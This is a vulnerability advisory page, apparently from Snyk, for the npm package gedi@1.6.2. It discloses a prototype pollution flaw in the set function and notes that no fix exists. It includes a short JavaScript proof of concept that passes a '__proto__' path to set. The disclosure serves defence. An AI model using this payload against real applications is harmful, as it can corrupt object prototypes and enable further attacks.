gedi@1.6.2 vulnerabilities

An evented data API

  • latest version

    1.6.3

  • first published

    11 years ago

  • latest version published

    10 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the gedi package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • C
    Prototype Pollution

    gedi is an An evented data API

    Affected versions of this package are vulnerable to Prototype Pollution via the set function.

    POC

    const gedi = require('gedi');
    try {
        gedi().set('[__proto__/polluted]', true);
    } catch(e) {}
    console.log(polluted);
    

    How to fix Prototype Pollution?

    There is no fixed version for gedi.

    *